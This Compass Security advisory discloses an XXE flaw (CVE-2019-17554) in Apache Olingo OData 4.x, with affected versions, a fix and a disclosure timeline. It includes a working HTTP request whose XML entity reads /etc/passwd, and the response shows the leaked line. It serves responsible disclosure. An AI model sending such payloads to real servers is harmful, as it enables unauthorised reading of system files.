#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Apache Olingo OData 4.0
# Vendor: Apache Foundation
# CSNC ID: CSNC-2009-025
# CVE ID: CVE-2019-17554
# Subject: XML External Entity Resolution (XXE)
# Risk: High
# Effect: Remotely exploitable
# Author: Archibald Haddock (advisories@compass-security.com)
# Date: 08.11.2019
#
#############################################################
Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].
Affected:
---------
Vulnerable:
* Olingo OData 4.x.x to 4.6.x
Not vulnerable:
* Olingo OData 4.7.0
* The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the resolution of external entities.
Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
Request
======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
<a:id>Cars(1)</a:id>
<a:title></a:title>
<a:summary></a:summary>
<a:updated>2019-11-08T15:10:30Z</a:updated>
<a:author>
<a:name></a:name>
</a:author>
<a:link rel="edit" href="Cars(1)"></a:link>
<a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
<a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
<a:content type="application/xml">
<m:properties>
<d:Id m:type="Int16">1</d:Id>
<d:Model>F1 &xxe;</d:Model>
<d:ModelYear>2012</d:ModelYear>
<d:Price m:type="Decimal">189189.43</d:Price>
<d:Currency>EUR</d:Currency>
</m:properties>
</a:content>
</a:entry>
Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>
Workaround / Fix:
-----------------
Configure the XML reader securely [3].
In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
The XMLInputFactory should be configured, not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
Timeline:
---------
2019-11-08: Discovery by Compass Security
2019-11-08: Initial vendor notification
2019-11-08: Initial vendor response
2019-12-04: Release of fixed Version / Patch [4]
2019-12-05: Coordinated public disclosure date
[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt